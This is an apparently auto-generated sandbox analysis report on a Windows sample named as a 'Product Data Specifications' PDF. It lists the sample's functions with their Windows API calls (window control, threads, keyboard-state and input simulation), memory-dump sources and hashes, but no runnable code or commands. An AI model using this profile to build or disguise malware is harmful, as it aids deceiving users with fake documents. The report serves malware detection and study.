                              Download Yara Rule
                              APIs
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$MessageMoveSend
                              • String ID:
                              • API String ID: 896007046-0
                              • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                              • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                              • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                              • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                              Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                              • GetFocus.USER32 ref: 00448ACF
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$FocusMessageSend
                              • String ID:
                              • API String ID: 3429747543-0
                              • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                              • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                              • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                              • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                              Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                              • __swprintf.LIBCMT ref: 0045D4E9
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume__swprintf
                              • String ID: %lu$\VH
                              • API String ID: 3164766367-2432546070
                              • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                              • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                              • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                              • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                              Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: Msctls_Progress32
                              • API String ID: 3850602802-3636473452
                              • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                              • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                              • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                              • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                              Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                              • String ID:
                              • API String ID: 3985565216-0
                              • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                              • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                              • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                              • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                              Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _malloc.LIBCMT ref: 0041F707
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _free.LIBCMT ref: 0041F71A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AllocateHeap_free_malloc
                              • String ID: [B
                              • API String ID: 1020059152-632041663
                              • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                              • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                              • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                              • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                              Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                              Download Yara Rule
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                              • __calloc_crt.LIBCMT ref: 00413DB0
                              • __getptd.LIBCMT ref: 00413DBD
                              • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                              • _free.LIBCMT ref: 00413E07
                              • __dosmaperr.LIBCMT ref: 00413E12
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 155776804-0
                              • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                              • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                              • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                              • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                              Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                              • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                              • String ID:
                              • API String ID: 1957940570-0
                              • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                              • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                              • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                              • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                              Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                              Download Yara Rule
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 259663610-0
                              • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                              • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                              • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                              • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                              Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                              Download Yara Rule
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004302E6
                              • GetWindowRect.USER32(00000000,?), ref: 00430316
                              • GetClientRect.USER32(?,?), ref: 00430364
                              • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                              • GetWindowRect.USER32(?,?), ref: 004303C3
                              • ScreenToClient.USER32(?,?), ref: 004303EC
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Rect$Client$Window$MetricsScreenSystem
                              • String ID:
                              • API String ID: 3220332590-0
                              • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                              • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                              • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                              • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                              Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _malloc_wcslen$_strcat_wcscpy
                              • String ID:
                              • API String ID: 1612042205-0
                              • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                              • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                              • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                              • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                              Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: >$U$\
                              • API String ID: 2666721431-237099441
                              • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                              • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                              Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C570
                              • SetKeyboardState.USER32(00000080), ref: 0044C594
                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$InputSend
                              • String ID:
                              • API String ID: 2221674350-0
                              • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                              • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                              Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscpy$_wcscat
                              • String ID:
                              • API String ID: 2037614760-0
                              • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                              • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                              Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                              • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                              • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
